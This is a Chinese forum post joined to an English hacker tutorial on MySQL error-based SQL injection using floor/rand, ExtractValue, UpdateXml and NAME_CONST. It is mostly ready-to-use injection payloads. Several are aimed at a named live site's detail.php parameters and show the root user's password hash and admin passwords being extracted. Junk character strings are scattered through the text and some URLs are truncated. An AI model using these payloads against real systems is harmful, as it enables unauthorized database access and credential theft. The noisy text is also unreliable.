mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
9 J8 R$ Q( T1 P+ J: Z8 q+ R首先进行正常查询：

mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
+—-+——-+———+
|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
" e' M; ^, `* |! A, `ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
1 l3 F. r  U% Q例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
% g7 w+ M* L! ^9 g7 {9 a6 J. }ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
3 ]5 s  s6 I9 `* Y测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

再收集：

6 |! J1 U% n; A  Chttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

& Y, [$ `; x6 FErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
( t' u3 ^( \: s  e' \0 ^  q
4 J1 J: L" ^, H6 ?1 l% \! uErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
2 x( h9 f/ U' a7 ]4 G, }* |8 b
' Q' x! L* B: \) m1 f4 uMYSQL高版本报错注入技巧-利用NAME_CONST注入
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

) z! o5 P% l# {
相关信息

! I7 O2 K5 W+ `* B" n. FNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
% s* H; Z- o" ]8 `
Code:
" o) z; T/ g1 y% ^& Y  gNAME_CONST(DATA, VALUE)
) A4 Q- G1 o! R5 F
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
5 p7 c4 @% S8 b- r- [1 @, ^$ L, M
& ]0 O2 S' U- U% P2 L' OSELECT NAME_CONST('TEST', 1)
. Z% v; c$ f/ h# d$ S$ H+ m1 ]

: Q9 a& l, A1 b# z8 k0 _# {: ]6 Z
* V4 H5 v) x9 A5 P* ^|---------------|
* a3 c& K: I6 h! F! G|     TEST      |
|               |
|---------------|
& f9 l( @' Z! j: d; R) r; P* D|       1       |
: P& S7 j$ [' B5 [4 a+ h- q% Q|               |
|---------------|
7 N/ w, G4 V: F6 Y6 O% a
1 M4 B- z) ?+ b, l" F8 d: t
, f# _8 l: d! X- _# T
0 C; O' M7 x  \4 \7 I4 x
3 h  f4 m/ v! d! u7 chttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

, w7 M, l, O' v) |- VOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

0 F( [) N* }* e0 H9 @# GCode:
  `5 f( _$ R  ]2 `* ohttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261





( ~1 j+ Z) ^7 U/ N  VCode:
- E# N- R+ _; c; kand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--


" u! p7 n0 v7 }" `$ ~0 h) OVAR = Your MySQL variable.
8 H7 t2 |: [( T- F, t" q) U' \* t
MySQL 5.1.3 Server System Variables
4 _; ~2 @( W8 Y
Let's try it out on my site..
. _+ C- K- `& ~6 M/ B/ F3 T, h" y* P
! W  U2 a- l% `7 s+ h8 XCode:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
, n5 |3 d0 S1 T  i4 B/ V
Erroruplicate column name '5.0.27-community-nt'

' ~% }  r4 {2 t& l: h5 u
8 B9 F, W5 Z0 P1 F2 J& d

# o0 u& j$ j. c9 f
! @1 ~4 l: |7 U! R. b  ENow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
8 n5 e- Y0 p7 B9 t4 I/ m; R/ K
Data Extraction
( V. m+ O6 M# o. q
Code:
# D9 c4 u0 p0 ]+ y+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
# o4 p/ A" \4 n# Q) e
, G2 i  V; g, T; V: s/ S" B
We should get a duplicate column 1 error...
9 ]& S6 J  k; x0 V5 a
Code:
) s  s, A7 }5 ]  n* P; r) S4 b$ {http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Erroruplicate column name '1
8 g) t, ?) V" K9 ^: r$ t6 R
; Y( ]/ Y) u% V( ?' e5 i

3 s" g8 b' W$ x$ k+ Z
" m( ~; h( A2 i/ D+ c
. n( F4 L+ O% e
3 O+ X" u9 O/ ~2 m4 WNow let's get the tables out this bitch..

Code:
: I( o+ R! a9 X; H4 u+ Y! x+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
5 j) ~$ G4 T0 {, u5 ^  N8 G
4 W( x. ~2 j" |0 l$ B4 a
9 O% Q2 U6 v# j7 RLet's see if it works here, if it does, we can go on and finish the job.
4 w2 V8 J" g4 ?7 `; x* @
# O+ q! t$ G( }% i; {  CCode:
" l4 z! h! X4 |, |: Khttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
! |) D: w# I  D% M& |
, @9 r* l6 L$ D6 S6 f
, @( ]6 @+ |' i. [! G* ^# o! N8 \# c  lErroruplicate column name 'com_admanage


) ]( u& y! M- O6 V, I* @
; e% _- |* h8 L6 y2 E+ F


: n" d+ C. ^/ L7 tNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.

/ n! z" [0 m( C3 J8 K* HLet's get the columns out of the user table..
8 b) A0 M) R. B8 M* n
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
0 B5 B; o# ]! S* @; X. O+ E# F4 F

So mine looks like this, and I get the duplicate column name 'Host'.
: Y- }7 M1 m' [$ U9 k
Code:
! @$ N: Q& A6 I3 M0 j* ^7 {http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
+ H  A- M2 q0 E7 o2 }' k( {8 L2 X
* c0 ]  G& |" {4 \3 f6 {Erroruplicate column name 'Host'


. f0 V7 J4 W9 h4 c
' E( T/ C2 R  F1 S% h% y

* i6 t+ n% V% R
Woot, time to finish this bitch off.

4 ?9 x& W, I3 pCode:
$ Y1 B* S) B& H% d+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--


8 u3 I' ^+ F6 p3 e1 c$ L( pSo mine looks like this...

- s$ f- m, k/ q  sCode:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
  {$ _) u2 x! x: M; A1 o
2 [5 }: D0 O; P" L+ {
$ `1 R; `/ c1 z2 j7 ^, ?



7 `' r$ E' K0 u6 EAnd there we have it, thanks for reading.

1 O. [% ^" b7 W' w- y$ T2 d